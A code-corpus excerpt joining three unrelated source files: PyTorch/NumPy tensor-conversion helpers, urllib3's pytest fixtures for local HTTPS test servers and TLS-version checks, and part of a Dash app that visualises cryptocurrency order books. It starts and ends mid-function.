for k in item.keys():
if k in ignore_keys:
new_item[k] = item[k]
else:
new_item[k] = to_device(item[k], device)
return new_item
elif isinstance(item, numbers.Integral) or isinstance(item, numbers.Real):
return item
elif isinstance(item, np.ndarray) or isinstance(item, np.bool_):
return item
elif item is None or isinstance(item, str):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_dtype(item: Any, dtype: type) -> Any:
r"""
Overview:
Change data to certain dtype
Arguments:
- item (:obj:`Any`): the item to be dtype changed
- dtype (:obj:`type`): the type wanted
Returns:
- item (:obj:`object`): the dtype changed item
.. note:
Now supports item type: :obj:`torch.Tensor`, :obj:`Sequence`, :obj:`dict`
"""
if isinstance(item, torch.Tensor):
return item.to(dtype=dtype)
elif isinstance(item, Sequence):
return [to_dtype(t, dtype) for t in item]
elif isinstance(item, dict):
return {k: to_dtype(item[k], dtype) for k in item.keys()}
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_tensor(
item: Any,
dtype: Optional[torch.dtype] = None,
ignore_keys: list = [],
transform_scalar: bool = True
) -> torch.Tensor:
r"""
Overview:
Change `numpy.ndarray`, sequence of scalars to torch.Tensor, and keep other data types unchanged.
Arguments:
- item (:obj:`Any`): the item to be changed
- dtype (:obj:`type`): the type of wanted tensor
Returns:
- item (:obj:`torch.Tensor`): the change tensor
.. note:
Now supports item type: :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
def transform(d):
if dtype is None:
return torch.as_tensor(d)
else:
return torch.tensor(d, dtype=dtype)
if isinstance(item, dict):
new_data = {}
for k, v in item.items():
if k in ignore_keys:
new_data[k] = v
else:
new_data[k] = to_tensor(v, dtype, ignore_keys, transform_scalar)
return new_data
elif isinstance(item, list) or isinstance(item, tuple):
if len(item) == 0:
return []
elif isinstance(item[0], numbers.Integral) or isinstance(item[0], numbers.Real):
return transform(item)
elif hasattr(item, '_fields'): # namedtuple
return type(item)(*[to_tensor(t, dtype) for t in item])
else:
new_data = []
for t in item:
new_data.append(to_tensor(t, dtype, ignore_keys, transform_scalar))
return new_data
elif isinstance(item, np.ndarray):
if dtype is None:
if item.dtype == np.float64:
return torch.FloatTensor(item)
else:
return torch.from_numpy(item)
else:
return torch.from_numpy(item).to(dtype)
elif isinstance(item, bool) or isinstance(item, str):
return item
elif np.isscalar(item):
if transform_scalar:
if dtype is None:
return torch.as_tensor(item)
else:
return torch.as_tensor(item).to(dtype)
else:
return item
elif item is None:
return None
elif isinstance(item, torch.Tensor):
if dtype is None:
return item
else:
return item.to(dtype)
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_ndarray(item: Any, dtype: np.dtype = None) -> np.ndarray:
r"""
Overview:
Change `torch.Tensor`, sequence of scalars to ndarray, and keep other data types unchanged.
Arguments:
- item (:obj:`object`): the item to be changed
- dtype (:obj:`type`): the type of wanted ndarray
Returns:
- item (:obj:`object`): the changed ndarray
.. note:
Now supports item type: :obj:`torch.Tensor`, :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
def transform(d):
if dtype is None:
return np.array(d)
else:
return np.array(d, dtype=dtype)
if isinstance(item, dict):
new_data = {}
for k, v in item.items():
new_data[k] = to_ndarray(v, dtype)
return new_data
elif isinstance(item, list) or isinstance(item, tuple):
if len(item) == 0:
return None
elif isinstance(item[0], numbers.Integral) or isinstance(item[0], numbers.Real):
return transform(item)
elif hasattr(item, '_fields'): # namedtuple
return type(item)(*[to_ndarray(t, dtype) for t in item])
else:
new_data = []
for t in item:
new_data.append(to_ndarray(t, dtype))
return new_data
elif isinstance(item, torch.Tensor):
if dtype is None:
return item.numpy()
else:
return item.numpy().astype(dtype)
elif isinstance(item, np.ndarray):
if dtype is None:
return item
else:
return item.astype(dtype)
elif isinstance(item, bool) or isinstance(item, str):
return item
elif np.isscalar(item):
return np.array(item)
elif item is None:
return None
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_list(item: Any) -> list:
r"""
Overview:
Transform `torch.Tensor`, `numpy.ndarray` to `list`, keep other data types unchanged
Arguments:
- item (:obj:`Any`): the item to be transformed
Returns:
- item (:obj:`list`): the list after transformation
.. note::
Now supports item type: :obj:`torch.Tensor`,:obj:`numpy.ndarray`, :obj:`dict`, :obj:`list`, \
:obj:`tuple` and :obj:`None`
"""
if item is None:
return item
elif isinstance(item, torch.Tensor):
return item.tolist()
elif isinstance(item, np.ndarray):
return item.tolist()
elif isinstance(item, list) or isinstance(item, tuple):
return [to_list(t) for t in item]
elif isinstance(item, dict):
return {k: to_list(v) for k, v in item.items()}
elif np.isscalar(item):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
def tensor_to_list(item):
r"""
Overview:
Transform `torch.Tensor` to `list`, keep other data types unchanged
Arguments:
- item (:obj:`Any`): the item to be transformed
Returns:
- item (:obj:`list`): the list after transformation
.. note::
Now supports item type: :obj:`torch.Tensor`, :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
if item is None:
return item
elif isinstance(item, torch.Tensor):
return item.tolist()
elif isinstance(item, list) or isinstance(item, tuple):
return [tensor_to_list(t) for t in item]
elif isinstance(item, dict):
return {k: tensor_to_list(v) for k, v in item.items()}
elif np.isscalar(item):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
def same_shape(data: list) -> bool:
r"""
Overview:
Judge whether all data elements in a list have the same shape.
Arguments:
- data (:obj:`list`): the list of data
Returns:
- same (:obj:`bool`): whether the list of data all have the same shape
"""
assert (isinstance(data, list))
shapes = [t.shape for t in data]
return len(set(shapes)) == 1
class LogDict(dict):
'''
Overview:
Derived from ``dict``; Would transform ``torch.Tensor`` to ``list`` for convenient logging.
'''
def _transform(self, data):
if isinstance(data, torch.Tensor):
new_data = data.tolist()
else:
new_data = data
return new_data
def __setitem__(self, key, value):
new_value = self._transform(value)
super().__setitem__(key, new_value)
def update(self, data):
for k, v in data.items():
self.__setitem__(k, v)
def build_log_buffer():
r"""
Overview:
Builg log buffer, a subclass of dict, which can transform the input data into log format.
Returns:
- log_buffer (:obj:`LogDict`): Log buffer dict
"""
return LogDict()
class CudaFetcher(object):
"""
Overview:
Fetch data from source, and transfer it to specified device.
Interfaces:
run, close
"""
def __init__(self, data_source: Iterable, device: str, queue_size: int = 4, sleep: float = 0.1) -> None:
self._source = data_source
self._queue = Queue(maxsize=queue_size)
self._stream = torch.cuda.Stream()
self._producer_thread = Thread(target=self._producer, args=(), name='cuda_fetcher_producer')
self._sleep = sleep
self._device = device
def __next__(self) -> Any:
return self._queue.get()
def run(self) -> None:
"""
Overview:
Start `producer` thread: Keep fetching data from source,
change the device, and put into `queue` for request.
"""
self._end_flag = False
self._producer_thread.start()
def close(self) -> None:
"""
Overview:
Stop `producer` thread by setting `end_flag` to `True`.
"""
self._end_flag = True
def _producer(self) -> None:
with torch.cuda.stream(self._stream):
while not self._end_flag:
if self._queue.full():
time.sleep(self._sleep)
else:
data = next(self._source)
data = to_device(data, self._device)
self._queue.put(data)
def get_tensor_data(data: Any) -> Any:
"""
Overview:
Get pure tensor data from the given data(without disturbing grad computation graph)
"""
if isinstance(data, torch.Tensor):
return data.data.clone()
elif data is None:
return None
elif isinstance(data, Sequence):
return [get_tensor_data(d) for d in data]
elif isinstance(data, dict):
return {k: get_tensor_data(v) for k, v in data.items()}
else:
raise TypeError("not support type in get_tensor_data: {}".format(type(data)))
|
conftest.py
|
import collections
import contextlib
import platform
import socket
import ssl
import sys
import threading
import pytest
import trustme
from tornado import ioloop, web
from dummyserver.handlers import TestingApp
from dummyserver.proxy import ProxyHandler
from dummyserver.server import HAS_IPV6, run_tornado_app
from dummyserver.testcase import HTTPSDummyServerTestCase
from urllib3.util import ssl_
from .tz_stub import stub_timezone_ctx
# The Python 3.8+ default loop on Windows breaks Tornado
@pytest.fixture(scope="session", autouse=True)
def configure_windows_event_loop():
if sys.version_info >= (3, 8) and platform.system() == "Windows":
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
ServerConfig = collections.namedtuple("ServerConfig", ["host", "port", "ca_certs"])
def _write_cert_to_dir(cert, tmpdir, file_prefix="server"):
cert_path = str(tmpdir / ("%s.pem" % file_prefix))
key_path = str(tmpdir / ("%s.key" % file_prefix))
cert.private_key_pem.write_to_path(key_path)
cert.cert_chain_pems[0].write_to_path(cert_path)
certs = {"keyfile": key_path, "certfile": cert_path}
return certs
@contextlib.contextmanager
def run_server_in_thread(scheme, host, tmpdir, ca, server_cert):
ca_cert_path = str(tmpdir / "ca.pem")
ca.cert_pem.write_to_path(ca_cert_path)
server_certs = _write_cert_to_dir(server_cert, tmpdir)
io_loop = ioloop.IOLoop.current()
app = web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(app, io_loop, server_certs, scheme, host)
server_thread = threading.Thread(target=io_loop.start)
server_thread.start()
yield ServerConfig(host, port, ca_cert_path)
io_loop.add_callback(server.stop)
io_loop.add_callback(io_loop.stop)
server_thread.join()
@contextlib.contextmanager
def run_server_and_proxy_in_thread(
proxy_scheme, proxy_host, tmpdir, ca, proxy_cert, server_cert
):
ca_cert_path = str(tmpdir / "ca.pem")
ca.cert_pem.write_to_path(ca_cert_path)
server_certs = _write_cert_to_dir(server_cert, tmpdir)
proxy_certs = _write_cert_to_dir(proxy_cert, tmpdir, "proxy")
io_loop = ioloop.IOLoop.current()
server = web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(server, io_loop, server_certs, "https", "localhost")
server_config = ServerConfig("localhost", port, ca_cert_path)
proxy = web.Application([(r".*", ProxyHandler)])
proxy_app, proxy_port = run_tornado_app(
proxy, io_loop, proxy_certs, proxy_scheme, proxy_host
)
proxy_config = ServerConfig(proxy_host, proxy_port, ca_cert_path)
server_thread = threading.Thread(target=io_loop.start)
server_thread.start()
yield (proxy_config, server_config)
io_loop.add_callback(server.stop)
io_loop.add_callback(proxy_app.stop)
io_loop.add_callback(io_loop.stop)
server_thread.join()
@pytest.fixture
def no_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only common name, no subject alternative names
server_cert = ca.issue_cert(common_name=u"localhost")
with run_server_in_thread("https", "localhost", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def no_san_proxy(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only common name, no subject alternative names
proxy_cert = ca.issue_cert(common_name=u"localhost")
server_cert = ca.issue_cert(u"localhost")
with run_server_and_proxy_in_thread(
"https", "localhost", tmpdir, ca, proxy_cert, server_cert
) as cfg:
yield cfg
@pytest.fixture
def no_localhost_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# non localhost common name
server_cert = ca.issue_cert(u"example.com")
with run_server_in_thread("https", "localhost", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv4_san_proxy(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
proxy_cert = ca.issue_cert(u"127.0.0.1")
server_cert = ca.issue_cert(u"localhost")
with run_server_and_proxy_in_thread(
"https", "127.0.0.1", tmpdir, ca, proxy_cert, server_cert
) as cfg:
yield cfg
@pytest.fixture
def ipv6_san_proxy(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP addresses in Subject Alternative Name
proxy_cert = ca.issue_cert(u"::1")
server_cert = ca.issue_cert(u"localhost")
with run_server_and_proxy_in_thread(
"https", "::1", tmpdir, ca, proxy_cert, server_cert
) as cfg:
yield cfg
@pytest.fixture
def ipv4_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert(u"127.0.0.1")
with run_server_in_thread("https", "127.0.0.1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_addr_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Common Name
server_cert = ca.issue_cert(common_name=u"::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_san_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert(u"::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.yield_fixture
def stub_timezone(request):
"""
A pytest fixture that runs the test with a stub timezone.
"""
with stub_timezone_ctx(request.param):
yield
@pytest.fixture(scope="session")
def supported_tls_versions():
# We have to create an actual TLS connection
# to test if the TLS version is not disabled by
# OpenSSL config. Ubuntu 20.04 specifically
# disables TLSv1 and TLSv1.1.
tls_versions = set()
_server = HTTPSDummyServerTestCase()
_server._start_server()
for _ssl_version_name in (
"PROTOCOL_TLSv1",
"PROTOCOL_TLSv1_1",
"PROTOCOL_TLSv1_2",
"PROTOCOL_TLS",
):
_ssl_version = getattr(ssl, _ssl_version_name, 0)
if _ssl_version == 0:
continue
_sock = socket.create_connection((_server.host, _server.port))
try:
_sock = ssl_.ssl_wrap_socket(
_sock, cert_reqs=ssl.CERT_NONE, ssl_version=_ssl_version
)
except ssl.SSLError:
pass
else:
tls_versions.add(_sock.version())
_sock.close()
_server._stop_server()
return tls_versions
@pytest.fixture(scope="function")
def requires_tlsv1(supported_tls_versions):
"""Test requires TLSv1 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1") or "TLSv1" not in supported_tls_versions:
pytest.skip("Test requires TLSv1")
@pytest.fixture(scope="function")
def requires_tlsv1_1(supported_tls_versions):
"""Test requires TLSv1.1 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1_1") or "TLSv1.1" not in supported_tls_versions:
pytest.skip("Test requires TLSv1.1")
@pytest.fixture(scope="function")
def requires_tlsv1_2(supported_tls_versions):
"""Test requires TLSv1.2 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1_2") or "TLSv1.2" not in supported_tls_versions:
pytest.skip("Test requires TLSv1.2")
@pytest.fixture(scope="function")
def requires_tlsv1_3(supported_tls_versions):
"""Test requires TLSv1.3 available"""
if (
not getattr(ssl, "HAS_TLSv1_3", False)
or "TLSv1.3" not in supported_tls_versions
):
pytest.skip("Test requires TLSv1.3")
|
app.py
|
# modules
# dash-related libraries
import dash
from dash.dependencies import Output, Event
from math import log10, floor, isnan
from datetime import datetime
from random import randint
import dash_core_components as dcc
import dash_html_components as html
import colorama
import sys
import getopt
# non-dash-related libraries
import plotly.graph_objs as go
import pandas as pd
import cbpro
import numpy as np
# modules added by contributors
import time
import threading
from queue import Queue
# custom library
from gdax_book import GDaxBook
colorama.init()
# creating variables to facilitate later parameterization
debugLevel = 3
debugLevels = ["Special Debug","Debug","Info","Warnings","Errors"]
debugColors = ['\033[34m','\033[90m','\033[32m','\033[33;1m','\033[31m']
serverPort = 8050
clientRefresh = 1
desiredPairRefresh = 10000 # (in ms) The lower it is, the better is it regarding speed of at least some pairs, the higher it is, the less cpu load it takes.
js_extern = "https://cdn.rawgit.com/pmaji/crypto-whale-watching-app/master/main.js"
noDouble = True # if activatet each order is in case of beeing part of a ladder just shown once (just as a bubble, not as a ladder)
SYMBOLS = {"USD": "$", "BTC": "₿", "EUR": "€", "GBP": "£"} # used for the tooltip
SIGNIFICANT = {"USD": 2, "BTC": 5, "EUR": 2, "GBP": 2} # used for rounding
TBL_PRICE = 'price'
TBL_VOLUME = 'volume'
tables = {}
depth_ask = {}
depth_bid = {}
marketPrice = {}
prepared = {}
shape_bid = {}
shape_ask = {}
timeStampsGet = {} # For storing timestamp of Data Refresh
timeStamps = {} # For storing timestamp from calc start at calc end
sendCache = {}
first_prepare = True
first_pull = True
overallNewData = False
class Exchange:
ticker = []
client = ""
def __init__(self, pName, pTicker, pStamp):
self.name = pName
self.ticker.extend(pTicker)
self.millis = pStamp
class Pair:
# Class to store a pair with its respective threads
def __init__(self, pExchange, pTicker):
self.ob_Inst = {}
self.threadWebsocket = {}
self.threadPrepare = {}
self.threadRecalc = {}
self.Dataprepared = False
self.webSocketKill = 1
self.lastStamp = 0
self.usedStamp = 0
self.newData = False
self.name = pExchange + " " + pTicker
self.ticker = pTicker
self.lastUpdate = "0"
self.exchange = pExchange
self.prepare = False
self.websocket = False
self.combined = pExchange + pTicker
PAIRS = [] # Array containing all pairs
E_GDAX = Exchange("GDAX", [
"ETH-USD", "ETH-EUR", "ETH-BTC",
"BTC-USD", "BTC-EUR", "BTC-GBP",
"LTC-USD", "LTC-EUR", "LTC-BTC",
"BCH-USD", "BCH-EUR", "BCH-BTC"], 0)
for ticker in E_GDAX.ticker:
cObj = Pair(E_GDAX.name, ticker)
PAIRS.append(cObj)
# creates a cache to speed up load time and facilitate refreshes
def get_data_cache(ticker):
return tables[ticker]
def get_All_data():
return prepared
def getSendCache():
return sendCache
def calc_data(pair, range=0.05, maxSize=32, minVolumePerc=0.01, ob_points=60):
global tables, timeStamps, shape_bid, shape_ask, E_GDAX, marketPrice, timeStampsGet
# function to get data from GDAX to be referenced in our call-back later
# ticker a string to particular Ticker (e.g. ETH-USD)
# range is the deviation visible from current price
# maxSize is a parameter to limit the maximum size of the bubbles in the viz
# minVolumePerc is used to set the minimum volume needed for a price-point to be included in the viz
ticker = pair.ticker
exchange = pair.exchange
combined = exchange + ticker
if pair.exchange == E_GDAX.name:
# order_book = gdax.PublicClient().get_product_order_book(ticker, level=3)
order_book = pair.ob_Inst.get_current_book()
pair.usedStamp = getStamp()
ask_tbl = pd.DataFrame(data=order_book['asks'], columns=[
TBL_PRICE, TBL_VOLUME, 'address'])
bid_tbl = pd.DataFrame(data=order_book['bids'], columns=[
TBL_PRICE, TBL_VOLUME, 'address'])
timeStampsGet[pair.combined] = datetime.now().strftime("%H:%M:%S") # save timestamp at data pull time
# Determine what currencies we're working with to make the tool tip more dynamic.
currency = ticker.split("-")[0]
base_currency = ticker.split("-")[1]
sig_use = SIGNIFICANT.get(base_currency.upper(), 2)
symbol = SYMBOLS.get(base_currency.upper(), "")
try:
first_ask = float(ask_tbl.iloc[1, 0])
except (IndexError):
log(4,"Empty data for " + combined + " Will wait 3s")
time.sleep(3)
return False
# prepare Price
ask_tbl[TBL_PRICE] = pd.to_numeric(ask_tbl[TBL_PRICE])
bid_tbl[TBL_PRICE] = pd.to_numeric(bid_tbl[TBL_PRICE])
# data from websocket are not sorted yet
ask_tbl = ask_tbl.sort_values(by=TBL_PRICE, ascending=True)
bid_tbl = bid_tbl.sort_values(by=TBL_PRICE, ascending=False)
# get first on each side
first_ask = float(ask_tbl.iloc[1, 0])
# get perc for ask/ bid
perc_above_first_ask = ((1.0 + range) * first_ask)
perc_above_first_bid = ((1.0 - range) * first_ask)
# limits the size of the table so that we only look at orders 5% above and under market price
ask_tbl = ask_tbl[(ask_tbl[TBL_PRICE] <= perc_above_first_ask)]
bid_tbl = bid_tbl[(bid_tbl[TBL_PRICE] >= perc_above_first_bid)]
# changing this position after first filter makes calc faster
bid_tbl[TBL_VOLUME] = pd.to_numeric(bid_tbl[TBL_VOLUME])
ask_tbl[TBL_VOLUME] = pd.to_numeric(ask_tbl[TBL_VOLUME])
# prepare everything for depchart
ob_step = (perc_above_first_ask - first_ask) / ob_points
ob_ask = pd.DataFrame(columns=[TBL_PRICE, TBL_VOLUME, 'address', 'text'])
ob_bid = pd.DataFrame(columns=[TBL_PRICE, TBL_VOLUME, 'address', 'text'])
# Following is creating a new tbl 'ob_bid' which contains the summed volume and adress-count from current price to target price
i = 1
last_ask = first_ask
last_bid = first_ask
current_ask_volume = 0
current_bid_volume = 0
current_ask_adresses = 0
current_bid_adresses = 0
while i < ob_points:
# Get Borders for ask/ bid
current_ask_border = first_ask + (i * ob_step)
current_bid_border = first_ask - (i * ob_step)
# Get Volume
current_ask_volume += ask_tbl.loc[
(ask_tbl[TBL_PRICE] >= last_ask) & (ask_tbl[TBL_PRICE] < current_ask_border), TBL_VOLUME].sum()
current_bid_volume += bid_tbl.loc[
(bid_tbl[TBL_PRICE] <= last_bid) & (bid_tbl[TBL_PRICE] > current_bid_border), TBL_VOLUME].sum()
# Get Adresses
current_ask_adresses += ask_tbl.loc[
(ask_tbl[TBL_PRICE] >= last_ask) & (ask_tbl[TBL_PRICE] < current_ask_border), 'address'].count()
current_bid_adresses += bid_tbl.loc[
(bid_tbl[TBL_PRICE] <= last_bid) & (bid_tbl[TBL_PRICE] > current_bid_border), 'address'].count()
# Prepare Text
ask_text = (str(round_sig(current_ask_volume, 3, 0, sig_use)) + currency + " (from " + str(current_ask_adresses) +
" orders) up to " + str(round_sig(current_ask_border, 3, 0, sig_use)) + symbol)
bid_text = (str(round_sig(current_bid_volume, 3, 0, sig_use)) + currency + " (from " + str(current_bid_adresses) +
" orders) down to " + str(round_sig(current_bid_border, 3, 0, sig_use)) + symbol)
# Save Data
ob_ask.loc[i - 1] = [current_ask_border, current_ask_volume, current_ask_adresses, ask_text]
ob_bid.loc[i - 1] = [current_bid_border, current_bid_volume, current_bid_adresses, bid_text]
i += 1
last_ask = current_ask_border
last_bid = current_bid_border
# Get Market Price
try:
mp = round_sig((ask_tbl[TBL_PRICE].iloc[0] +
bid_tbl[TBL_PRICE].iloc[0]) / 2.0, 3, 0, sig_use)
except (IndexError):
log(4,"Empty data for " + combined + " Will wait 3s")
time.sleep(3)
return False
bid_tbl = bid_tbl.iloc[::-1] # flip the bid table so that the merged full_tbl is in logical order
fulltbl = bid_tbl.append(ask_tbl) # append the buy and sell side tables to create one cohesive table
minVolume = fulltbl[TBL_VOLUME].sum() * minVolumePerc # Calc minimum Volume for filtering
fulltbl = fulltbl[
(fulltbl[TBL_VOLUME] >= minVolume)] # limit our view to only orders greater than or equal to the minVolume size
fulltbl['sqrt'] = np.sqrt(fulltbl[
TBL_VOLUME]) # takes the square root of the volume (to be used later on for the purpose of sizing the order bubbles)
final_tbl = fulltbl.groupby([TBL_PRICE])[
[TBL_VOLUME]].sum() # transforms the table for a final time to craft the data view we need for analysis
final_tbl['n_unique_orders'] = fulltbl.groupby(
TBL_PRICE).address.nunique().astype(int)
final_tbl = final_tbl[(final_tbl['n_unique_orders'] <= 20.0)]
final_tbl[TBL_PRICE] = final_tbl.index
final_tbl[TBL_PRICE] = final_tbl[TBL_PRICE].apply(round_sig, args=(3, 0, sig_use))
final_tbl[TBL_VOLUME] = final_tbl[TBL_VOLUME].apply(round_sig, args=(1, 2))
final_tbl['n_unique_orders'] = final_tbl['n_unique_orders'].apply(round_sig, args=(0,))
final_tbl['sqrt'] = np.sqrt(final_tbl[TBL_VOLUME])
final_tbl['total_price'] = (((final_tbl['volume'] * final_tbl['price']).round(2)).apply(lambda x: "{:,}".format(x)))
# Following lines fix double drawing of orders in case it´s a ladder but bigger than 1%
if noDouble:
bid_tbl = bid_tbl[(bid_tbl['volume'] < minVolume)]
ask_tbl = ask_tbl[(ask_tbl['volume'] < minVolume)]
bid_tbl['total_price'] = bid_tbl['volume'] * bid_tbl['price']
ask_tbl['total_price'] = ask_tbl['volume'] * ask_tbl['price']
# Get Dataset for Volume Grouping
vol_grp_bid = bid_tbl.groupby([TBL_VOLUME]).agg(
{TBL_PRICE: [np.min, np.max, 'count'], TBL_VOLUME: np.sum, 'total_price': np.sum})
vol_grp_ask = ask_tbl.groupby([TBL_VOLUME]).agg(
{TBL_PRICE: [np.min, np.max, 'count'], TBL_VOLUME: np.sum, 'total_price': np.sum})
# Rename column names for Volume Grouping
vol_grp_bid.columns = ['min_Price', 'max_Price', 'count', TBL_VOLUME, 'total_price']
vol_grp_ask.columns = ['min_Price', 'max_Price', 'count', TBL_VOLUME, 'total_price']
# Filter data by min Volume, more than 1 (intefere with bubble), less than 70 (mostly 1 or 0.5 ETH humans)
vol_grp_bid = vol_grp_bid[
((vol_grp_bid[TBL_VOLUME] >= minVolume) & (vol_grp_bid['count'] >= 2.0) & (vol_grp_bid['count'] < 70.0))]
vol_grp_ask = vol_grp_ask[
((vol_grp_ask[TBL_VOLUME] >= minVolume) & (vol_grp_ask['count'] >= 2.0) & (vol_grp_ask['count'] < 70.0))]
# Get the size of each order
vol_grp_bid['unique'] = vol_grp_bid.index.get_level_values(TBL_VOLUME)
vol_grp_ask['unique'] = vol_grp_ask.index.get_level_values(TBL_VOLUME)
# Round the size of order
vol_grp_bid['unique'] = vol_grp_bid['unique'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['unique'] = vol_grp_ask['unique'].apply(round_sig, args=(3, 0, sig_use))
# Round the Volume
vol_grp_bid[TBL_VOLUME] = vol_grp_bid[TBL_VOLUME].apply(round_sig, args=(1, 0, sig_use))
vol_grp_ask[TBL_VOLUME] = vol_grp_ask[TBL_VOLUME].apply(round_sig, args=(1, 0, sig_use))
# Round the Min/ Max Price
vol_grp_bid['min_Price'] = vol_grp_bid['min_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['min_Price'] = vol_grp_ask['min_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_bid['max_Price'] = vol_grp_bid['max_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['max_Price'] = vol_grp_ask['max_Price'].apply(round_sig, args=(3, 0, sig_use))
# Round and format the Total Price
vol_grp_bid['total_price'] = (vol_grp_bid['total_price'].round(sig_use).apply(lambda x: "{:,}".format(x)))
vol_grp_ask['total_price'] = (vol_grp_ask['total_price'].round(sig_use).apply(lambda x: "{:,}".format(x)))
# Append individual text to each element
vol_grp_bid['text'] = ("There are " + vol_grp_bid['count'].map(str) + " orders " + vol_grp_bid['unique'].map(
str) + " " + currency +
" each, from " + symbol + vol_grp_bid['min_Price'].map(str) + " to " + symbol +
vol_grp_bid['max_Price'].map(str) + " resulting in a total of " + vol_grp_bid[
TBL_VOLUME].map(str) + " " + currency + " worth " + symbol + vol_grp_bid[
'total_price'].map(str))
vol_grp_ask['text'] = ("There are " + vol_grp_ask['count'].map(str) + " orders " + vol_grp_ask['unique'].map(
str) + " " + currency +
" each, from " + symbol + vol_grp_ask['min_Price'].map(str) + " to " + symbol +
vol_grp_ask['max_Price'].map(str) + " resulting in a total of " + vol_grp_ask[
TBL_VOLUME].map(str) + " " + currency + " worth " + symbol + vol_grp_ask[
'total_price'].map(str))
# Save data global
shape_ask[combined] = vol_grp_ask
shape_bid[combined] = vol_grp_bid
cMaxSize = final_tbl['sqrt'].max() # Fixing Bubble Size
# nifty way of ensuring the size of the bubbles is proportional and reasonable
sizeFactor = maxSize / cMaxSize
final_tbl['sqrt'] = final_tbl['sqrt'] * sizeFactor
# making the tooltip column for our charts
final_tbl['text'] = (
"There is a " + final_tbl[TBL_VOLUME].map(str) + " " + currency + " order for " + symbol + final_tbl[
TBL_PRICE].map(str) + " being offered by " + final_tbl['n_unique_orders'].map(
str) + " unique orders worth " + symbol + final_tbl['total_price'].map(str))
# determine buys / sells relative to last market price; colors price bubbles based on size
# Buys are green, Sells are Red. Probably WHALES are highlighted by being brighter, detected by unqiue order count.
final_tbl['colorintensity'] = final_tbl['n_unique_orders'].apply(calcColor)
final_tbl.loc[(final_tbl[TBL_PRICE] > mp), 'color'] = \
'rgb(' + final_tbl.loc[(final_tbl[TBL_PRICE] >
mp), 'colorintensity'].map(str) + ',0,0)'
final_tbl.loc[(final_tbl[TBL_PRICE] <= mp), 'color'] = \
'rgb(0,' + final_tbl.loc[(final_tbl[TBL_PRICE]
<= mp), 'colorintensity'].map(str) + ',0)'
timeStamps[combined] = timeStampsGet[combined] # now save timestamp of calc start in timestamp used for title
tables[combined] = final_tbl # save table data
marketPrice[combined] = mp # save market price
depth_ask[combined] = ob_ask
depth_bid[combined] = ob_bid
pair.newData = True
pair.prepare = True # just used for first enabling of send prepare
return True
# begin building the dash itself
app = dash.Dash()
app.scripts.append_script({"external_url": js_extern})
# simple layout that can be improved with better CSS/JS later, but it does the job for now
# static_content_before contains all the info we want in our headers that won't be dynamic (for now)
static_content_before = [
html.H2('CRYPTO WHALE WATCHING APP'),
html.H3(html.A('GitHub Link Here (Consider supporting us by giving a star; request new features via "issues" tab)',
href="https://github.com/pmaji/eth_python_tracker")),
html.P([
"Legend: Bright colored mark = likely WHALE ",
"(high volume price point via 1 unique order, or many identical medium-sized orders in a ladder). ", html.Br(),
"Bubbles get darker as the number of unique orders increases. " , html.Br(),
"Hover over bubbles for more info. Note: volume (x-axis) on log-scale. " , html.Br(),
"Click 'Freeze all' button to halt refresh, "
"and hide/show buttons to pick which currency pairs to display. " , html.Br(),
"Only displays orders >= 1% of the volume of the portion of the order book displayed. ", html.Br(),
"If annotations overlap or bubbles cluster, click 'Freeze all' and then zoom in on the area of interest.", html.Br(),
"See GitHub link above for further details."
])
]
cCache = []
for pair in PAIRS:
ticker = pair.ticker
exchange = pair.exchange
graph = 'live-graph-' + exchange + "-" + ticker
cCache.append(html.Br())
cCache.append(html.Div(id=graph))
static_content_after = dcc.Interval(
id='main-interval-component',
interval=clientRefresh * 1000
)
app.layout = html.Div(id='main_container', children=[
html.Div(static_content_before),
html.Div(id='graphs_Container', children=cCache),
html.Div(static_content_after),
])
def prepare_data(ticker, exchange):
combined = exchange + ticker
data = get_data_cache(combined)
pair.newData = False
base_currency = ticker.split("-")[1]
ob_ask = depth_ask[combined]
ob_bid = depth_bid[combined]
#Get Minimum and Maximum
ladder_Bid_Min = fixNan(shape_bid[combined]['volume'].min())
ladder_Bid_Max = fixNan(shape_bid[combined]['volume'].max(), False)
ladder_Ask_Min = fixNan(shape_ask[combined]['volume'].min())
